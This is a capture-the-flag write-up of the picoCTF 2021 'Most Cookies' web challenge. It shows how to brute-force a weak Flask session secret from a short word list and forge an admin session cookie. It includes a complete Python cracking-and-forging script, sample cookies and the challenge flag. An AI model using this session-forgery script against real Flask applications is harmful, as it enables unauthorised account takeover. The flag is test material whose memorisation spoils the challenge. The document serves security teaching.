PicoCTF-2021 Writeup
Web Exploitation

Most Cookies


Last updated 2 years ago


Problem

Alright, enough of using my own encryption. Flask session cookies should be plenty secure!

http://mercury.picoctf.net:18835/
server.py

Solution

  1. Looking at the server script (server.py) we can see that the app’s secret key is set to a random cookie name:

    cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
    app.secret_key = random.choice(cookie_names)
  2. The app’s secret key is used to sign the Flask session cookie so that it cannot be modified without detection. The cookie is signed, not encrypted: anyone can read its contents, but only someone holding the secret key can produce a valid signature. However, since we know the secret key is one of the 28 cookie names, we can simply try them all until one produces the signature we see on a real cookie.

  3. So, the first step is to go to the website and copy a session cookie: eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI

     A Flask session cookie has three dot-separated parts: the URL-safe base64 payload (here the JSON {"very_auth": "snickerdoodle"}), a base64 timestamp, and the HMAC signature over the first two parts.

  4. We can write a script that reuses the logic from Flask’s SecureCookieSessionInterface (an itsdangerous URLSafeTimedSerializer with the salt "cookie-session") to decode and encode cookies.

  5. But first we need to determine what value we should set in the cookie. We can find this on lines 45-47 of the server code:

    check = session["very_auth"]
    if check == "admin":
        resp = make_response(render_template("flag.html", value=flag_value, title=title))

    So, we need to store {"very_auth": "admin"} in the cookie.

  6. Running the solve script tries each candidate secret key in turn. Once it finds the key whose signature matches the known cookie, it uses that key to sign the admin cookie data above:

    Secret Key: whoopie pie
    Admin Cookie: eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFNdhA.jyQttlEVJ3eQhTuA9cEp8FDC_fk
  7. We can replace the cookie on the website with our admin cookie, refresh the page, and the flag will be shown.
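The procedure in steps 1-7, as an added worked example that is not part of the original writeup. It reimplements, with only the Python standard library, the scheme that Flask's SecureCookieSessionInterface gets from itsdangerous (salt "cookie-session", HMAC key derivation, SHA-1, URL-safe base64 without padding, and a "."-prefixed zlib-compressed payload when that is shorter), so it runs without Flask or itsdangerous installed. The cookie and the candidate list are the ones quoted above; COOKIE_NAMES, KNOWN_COOKIE and the function names are this example's own. Run against the page's cookie it should report whoopie pie, as step 6 does, and the cookie it forges differs from the page's only in the timestamp.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Candidate keys copied from the challenge's server.py.
COOKIE_NAMES = [
    "snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread",
    "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter",
    "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon",
    "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron",
    "black and white", "white chocolate macadamia",
]

# Session cookie copied from the browser in step 3 of the writeup.
KNOWN_COOKIE = "eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI"

# Constants used by flask.sessions.SecureCookieSessionInterface.
SALT = b"cookie-session"
DIGEST = hashlib.sha1


def b64e(raw):
    """URL-safe base64 without '=' padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64d(text):
    """Inverse of b64e: restore the padding before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def derive_key(secret):
    """itsdangerous key_derivation='hmac': the signing key is HMAC(secret, salt)."""
    return hmac.new(secret.encode(), SALT, DIGEST).digest()


def signature(secret, signed_value):
    """HMAC-SHA1 over 'payload.timestamp' under the derived key."""
    return b64e(hmac.new(derive_key(secret), signed_value.encode(), DIGEST).digest())


def dump_payload(data):
    """Compact JSON; zlib-compressed with a leading '.' only when that is shorter."""
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    if len(packed) < len(raw) - 1:
        return "." + b64e(packed)
    return b64e(raw)


def load_payload(text):
    """Undo dump_payload; no key is needed because the payload is only encoded."""
    if text.startswith("."):
        return json.loads(zlib.decompress(b64d(text[1:])))
    return json.loads(b64d(text))


def split_cookie(cookie):
    """Cookies are 'payload.timestamp.signature'; rsplit copes with a '.'-prefixed payload."""
    body, sig = cookie.rsplit(".", 1)
    payload, ts_b64 = body.rsplit(".", 1)
    return payload, ts_b64, sig


def decode_cookie(cookie):
    """Return (session data, issue time as a Unix timestamp) without any key."""
    payload, ts_b64, _ = split_cookie(cookie)
    return load_payload(payload), int.from_bytes(b64d(ts_b64), "big")


def crack_secret(cookie, candidates):
    """Return the candidate whose signature matches the cookie's, or None."""
    payload, ts_b64, sig = split_cookie(cookie)
    signed_value = payload + "." + ts_b64
    for secret in candidates:
        if hmac.compare_digest(signature(secret, signed_value), sig):
            return secret
    return None


def make_cookie(secret, data, ts=None):
    """Build a cookie the server will accept for `data` (ts defaults to now)."""
    if ts is None:
        ts = int(time.time())
    ts_b64 = b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed_value = dump_payload(data) + "." + ts_b64
    return signed_value + "." + signature(secret, signed_value)


if __name__ == "__main__":
    print("Decoded cookie:", decode_cookie(KNOWN_COOKIE))
    key = crack_secret(KNOWN_COOKIE, COOKIE_NAMES)
    print("Secret Key:", key)
    if key is not None:
        print("Admin Cookie:", make_cookie(key, {"very_auth": "admin"}))
```

The timestamp is part of the signed value, so a forged cookie cannot simply reuse the captured signature with a new payload; it has to be re-signed with the recovered key. The server never rejects a cookie for being old here, but Flask's PERMANENT_SESSION_LIFETIME would, so the script signs with the current time.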

Flag

picoCTF{pwn_4ll_th3_cook1E5_743c20eb}
